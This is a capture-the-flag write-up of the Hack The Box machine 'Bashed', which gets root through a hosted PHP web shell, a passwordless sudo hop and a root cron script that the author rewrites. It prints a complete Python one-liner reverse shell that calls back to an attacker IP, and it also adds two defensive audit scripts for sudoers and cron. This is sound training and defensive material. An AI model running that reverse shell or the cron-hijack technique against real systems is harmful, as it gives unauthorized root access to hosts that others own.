Bashed – Hack The Box

Overall Summary

Bashed is a Linux machine from Hack The Box that can be exploited through a web shell already hosted on the machine, which is then used to gain a reverse shell. The privilege escalation consists in first becoming a different user to gain access to a specific folder, finding a script there that is executed by root every minute, and editing it to get a root shell. Overall the machine is really simple to solve, yet a very good machine for people starting out in pentesting.

Scanning and Enumeration

A full TCP scan with nmap showed that only port 80 was open.

Browsing to port 80 displays a blog site. Its only entry talks about a PHP web shell that is implemented somewhere in the web service, so I used gobuster to look for directories and for files with the .php extension.
root@kali:~# gobuster -u http://10.10.10.68 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php

Gobuster v1.4.1              OJ Reeves (@TheColonial)
=====================================================
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.68/
[+] Threads      : 10
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 200,204,301,302,307
[+] Extensions   : .php
=====================================================
/images (Status: 301)
/uploads (Status: 301)
/php (Status: 301)
/css (Status: 301)
/dev (Status: 301)
/js (Status: 301)
/config.php (Status: 200)
/fonts (Status: 301)
Browsing to the /dev folder I was able to see two PHP web shells.

Using one of the PHP web shells I was able to get command execution.

Exploitation

Using the web shell I was able to see that the uploads folder was writable and therefore I could upload a PHP reverse shell.

I uploaded a PHP reverse shell from Pentestmonkey using wget into the uploads folder.

To get a reverse shell I browsed to the uploaded file and set up a netcat listener on port 443.

Post-Exploitation

The first thing I did before looking around for any other information was to get a TTY shell using Python.

Right off the bat there was a folder named “scripts”, which is not a default directory on a Linux system.

The current user didn’t have enough permissions to browse the folder, as it was owned by the scriptmanager user. Using the “sudo -l” command, however, I was able to see that the “www-data” user could execute commands as scriptmanager without providing a password, so I executed a bash shell as scriptmanager.

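The “sudo -l” finding above is a sudoers rule that lets a service account hop to another user with no password. As an added example that is not part of the original post or of the machine, here is a small audit script that parses sudoers-style rules and flags exactly that pattern: rules granted to a web-server or database account, rules tagged NOPASSWD, and rules allowing ALL commands. The sudoers text, the SERVICE_ACCOUNTS list and the regex are constructed assumptions; the regex covers the common “user host=(runas) TAG: commands” form and ignores alias definitions.

```python
"""Audit sudoers rules for passwordless privilege hops granted to service accounts.

Added example, not code from the machine or the post. The sudoers text below is
constructed; the regex covers the common "user host=(runas) TAG: commands" form
and ignores alias and Defaults lines.
"""
import re
from typing import Dict, List

# Accounts that run network services and should not hold sudo rights (assumed list)
SERVICE_ACCOUNTS = {"www-data", "apache", "nginx", "nobody", "mysql", "postgres"}

# user/%group  host = (runas[:group]) [TAG:]... commands
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<host>\S+)\s*=\s*"
    r"(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)"
    r"(?P<cmds>.+)$"
)

# Constructed sample: a sudoers file with one rule shaped like the one "sudo -l" revealed
SAMPLE_SUDOERS = """\
# constructed sample, not copied from the machine
Defaults env_reset
root     ALL=(ALL:ALL) ALL
%sudo    ALL=(ALL:ALL) ALL
backup   ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(scriptmanager : scriptmanager) NOPASSWD: ALL
"""


def parse_sudoers(text: str) -> List[Dict]:
    """Turn sudoers lines into dicts; comments, blank lines and Defaults are skipped."""
    rules = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith("Defaults"):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        rule = m.groupdict()
        rule["runas"] = (rule["runas"] or "root").strip()   # no (runas) part means root
        rule["tags"] = [t.strip() for t in rule["tags"].split(":") if t.strip()]
        rule["cmds"] = rule["cmds"].strip()
        rules.append(rule)
    return rules


def find_risky_rules(rules: List[Dict]) -> List[Dict]:
    """Flag rules that grant sudo to a service account or that require no password."""
    findings = []
    for rule in rules:
        reasons = []
        if rule["who"] in SERVICE_ACCOUNTS:
            reasons.append("service account has sudo rights")
        if "NOPASSWD" in rule["tags"]:
            reasons.append("no password required")
        if reasons and rule["cmds"] == "ALL":
            reasons.append("any command permitted")
        if reasons:
            findings.append({**rule, "reasons": reasons})
    return findings


def audit_sample() -> List[Dict]:
    """Run the audit over the constructed sudoers text."""
    return find_risky_rules(parse_sudoers(SAMPLE_SUDOERS))


if __name__ == "__main__":
    for f in audit_sample():
        print(f"{f['who']} -> ({f['runas']}) {f['cmds']}: {', '.join(f['reasons'])}")
```

Running it against a real host means feeding it the contents of /etc/sudoers and /etc/sudoers.d/*; the www-data rule comes back with all three reasons, which is the combination that turned a web shell into a second user here.
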
Browsing to the scripts folder shows two files, a python script and a text file.

The Python script opens the file named test.txt and writes the message “testing 123!”. The screenshot also shows that the text file is owned by the root user, meaning that the script is being executed with root privileges. I also noticed that test.txt kept being updated, since its timestamp changed about every minute, so I edited the Python script and placed a Python reverse shell in it. This is the one-liner Python reverse shell:
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.30",7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);

I then set up a netcat listener on port 7777 and waited about a minute to get a reverse shell as the root user.

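The root shell came from a cron job that runs, as root, a script owned and writable by another user. As an added example that is not part of the original post or of the machine, the following audit script shows how a defender would catch that configuration: it parses /etc/crontab-style entries, resolves the file each root job actually executes, and reports any script (or parent directory) that is not owned by root or is writable by group or others. The crontab text, the temporary script, the file name test.py and the interpreter list are constructed assumptions so the check runs offline.

```python
"""Audit cron jobs for scripts that root executes but other users can modify.

Added example, not code from the machine or the post. The crontab text and the
script it points at are constructed inside a temp directory so the check runs
offline; the interpreter list and the /etc/crontab field layout are assumptions.
"""
import os
import shlex
import stat
import tempfile
from typing import Dict, List

INTERPRETERS = {"python", "python2", "python3", "bash", "sh", "perl", "ruby"}


def script_from_command(command: str) -> str:
    """Return the file cron really executes: the script if an interpreter leads, else the first token."""
    tokens = shlex.split(command)
    if not tokens:
        return ""
    if os.path.basename(tokens[0]) in INTERPRETERS and len(tokens) > 1:
        return tokens[1]
    return tokens[0]


def parse_system_crontab(text: str) -> List[Dict[str, str]]:
    """Parse /etc/crontab-style lines: five schedule fields (or @special), a user, then the command."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # comment or variable assignment such as PATH=
        if line.startswith("@"):
            fields = line.split(None, 2)
            if len(fields) < 3:
                continue
            schedule, user, command = fields
        else:
            fields = line.split(None, 6)
            if len(fields) < 7:
                continue
            schedule, user, command = " ".join(fields[:5]), fields[5], fields[6]
        entries.append({"schedule": schedule, "user": user, "command": command})
    return entries


def weak_points(uid: int, mode: int, dir_uid: int, dir_mode: int) -> List[str]:
    """Pure check on stat data: who owns the script and its directory, and who may write them."""
    reasons = []
    if uid != 0:
        reasons.append("script not owned by root")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        reasons.append("script writable by group or others")
    if dir_uid != 0:
        reasons.append("parent directory not owned by root")
    if dir_mode & stat.S_IWOTH and not dir_mode & stat.S_ISVTX:
        reasons.append("parent directory world-writable without sticky bit")
    return reasons


def audit_crontab(text: str) -> List[Dict]:
    """Report root jobs whose script, or the directory holding it, can be changed by a non-root user."""
    findings = []
    for entry in parse_system_crontab(text):
        if entry["user"] != "root":
            continue                      # only jobs that run with root privileges matter here
        path = script_from_command(entry["command"])
        if not os.path.isabs(path) or not os.path.exists(path):
            continue
        st, dst = os.stat(path), os.stat(os.path.dirname(path))
        reasons = weak_points(st.st_uid, st.st_mode, dst.st_uid, dst.st_mode)
        if reasons:
            findings.append({**entry, "script": path, "reasons": reasons})
    return findings


def demo() -> List[Dict]:
    """Constructed scenario: a root job that runs every minute from a script anyone can edit."""
    with tempfile.TemporaryDirectory() as tmp:
        script = os.path.join(tmp, "test.py")          # constructed file name
        with open(script, "w") as fh:
            fh.write("open('test.txt', 'w').write('testing 123!')\n")
        os.chmod(script, 0o777)                         # the misconfiguration under test
        crontab = (
            "# constructed sample crontab, not copied from the machine\n"
            "PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n"
            f"* * * * * root /usr/bin/python3 {script}\n"
            "0 3 * * * backup /usr/bin/rsync -a /srv /backup\n"
        )
        return audit_crontab(crontab)


if __name__ == "__main__":
    for f in demo():
        print(f"{f['schedule']} {f['user']} {f['script']}: {', '.join(f['reasons'])}")
```

On a live system the same audit_crontab function is pointed at /etc/crontab and the files under /etc/cron.d; the fix it points to is the usual one, root-owned scripts with mode 755 in a root-owned directory, so that a lower-privileged user with access to the folder cannot rewrite what root runs every minute.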